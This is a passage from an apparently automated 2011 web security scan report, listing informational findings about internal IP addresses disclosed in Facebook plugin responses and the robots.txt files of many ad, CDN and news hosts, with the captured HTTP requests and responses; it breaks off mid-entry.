GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df42349018%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322bc3668%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda0aaa7%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a882414%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23cc7f5dc%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.52
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 22

Invalid Application ID

22.3. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.163.51
X-Cnection: close
Date: Sun, 04 Sep 2011 00:47:55 GMT
Content-Length: 25864

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

22.4. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.166.57
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 25864

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

22.5. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-State-Worker%2F174087795950002&width=292&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.143.43
X-Cnection: close
Date: Sun, 04 Sep 2011 01:03:04 GMT
Content-Length: 8338

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

23. Robots.txt file
There are 66 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


23.1. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:36 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


23.2. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 00:55:06 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.3. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:47:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:47:36 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

23.4. http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10105-135615-9432-62

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 00:53:45 GMT
Connection: keep-alive

User-agent: *
Disallow: /

23.5. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 00:46:53 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23.6. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

23.7. http://c.betrad.com/surly.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /surly.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:55:18 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 27 Sep 2010 18:26:29 GMT
ETag: "14b0194-1a-ddec5f40"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 00:58:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:17 GMT
Connection: close

User-agent: *
Disallow: /

23.9. http://cdn.gigya.com/js/socialize.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /js/socialize.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:52:13 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

23.10. http://cdn.optmd.com/V2/89733/235451/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/89733/235451/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "d54bba-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 00:52:58 GMT
Connection: close

User-agent: *
Disallow: /

23.11. http://cdn.turn.com/server/ddc.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sun, 04 Sep 2011 00:55:27 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.12. http://ce.lijit.com/merge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:09 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n15 ( lax-agg-n38), ht-d lax-agg-n38.panthercdn.com
ETag: "5b80d5-17a-4aacf20bc34c0"
Cache-Control: max-age=604800
Expires: Wed, 07 Sep 2011 12:18:02 GMT
Age: 304807
Content-Length: 378
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 18 Aug 2011 22:28:11 GMT
Connection: close

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.13. http://cim.meebo.com/cim

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /cim

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:08:38 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Tue, 09 Aug 2011 21:34:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

23.14. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

23.15. http://community.sprint.com/baw/index.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/index.jspa

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 01 Jul 2011 15:05:49 GMT
ETag: "2f1066-52-4a7035a536d40"
Accept-Ranges: bytes
Content-Length: 82
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /baw/people/
Disallow: /baw/jumpPage.jspa
Crawl-delay: 30

23.16. http://content.usatoday.com/communities/campusrivalry/topics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:42 GMT
Accept-Ranges: bytes
ETag: "0fbccbb165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

23.17. http://fonts1.scribdassets.com/static/4gen.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts1.scribdassets.com
Path:   /static/4gen.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts1.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:01:49 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n42 ( lax-agg-n58), ht-d lax-agg-n58.panthercdn.com
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 10:19:56 GMT
Age: 139313
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Sat, 10 Jul 2010 23:55:04 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow: /

23.18. http://fonts2.scribdassets.com/static/4gen_ie.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts2.scribdassets.com
Path:   /static/4gen_ie.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts2.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:19:21 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n31 ( lax-agg-n58), ht-d lax-agg-n58.panthercdn.com
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 10:19:56 GMT
Age: 140365
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Sat, 10 Jul 2010 23:55:04 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow: /

23.19. http://fonts4.scribdassets.com/static/4gen.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts4.scribdassets.com
Path:   /static/4gen.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts4.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:32 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n38 ( lax-agg-n58), ht lax-agg-n58.panthercdn.com
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 10:19:56 GMT
Age: 139356
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Sat, 10 Jul 2010 23:55:04 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow: /

23.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

23.21. http://get.lingospot.com/arc/stay/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://get.lingospot.com
Path:   /arc/stay/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: get.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1124621243"
Last-Modified: Mon, 18 Jun 2007 02:58:32 GMT
Content-Length: 27
Date: Sun, 04 Sep 2011 01:08:26 GMT
Server: lingo

User-agent: *
Disallow: /


23.22. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://html2.scribdassets.com
Path:   /7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: html2.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:09:47 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n17 ( lax-agg-n58), ht-d lax-agg-n58.panthercdn.com
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 10:19:56 GMT
Age: 139791
Content-Length: 25
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Sat, 10 Jul 2010 23:55:04 GMT
Access-Control-Allow-Origin: *
Via: 1.1 localhost.localdomain:3128 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow: /

23.23. http://i.casalemedia.com/imp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.casalemedia.com
Path:   /imp.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 00:53:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:07 GMT
Connection: close

User-agent: *
Disallow: /

23.24. http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=ISO-8859-1
Date: Sun, 04 Sep 2011 00:55:03 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.25. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:49 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

23.26. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

23.27. http://jlinks.industrybrains.com/jsct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 00:47:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 00:47:50 GMT
Content-Length: 26

User-agent: *
Disallow: /

23.28. http://l.addthiscdn.com/live/t00/250lo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 00:52:50 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


23.29. http://m.xp1.ru4.com/activity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:55:53 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

23.30. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s87897360916249

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s87897360916249

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
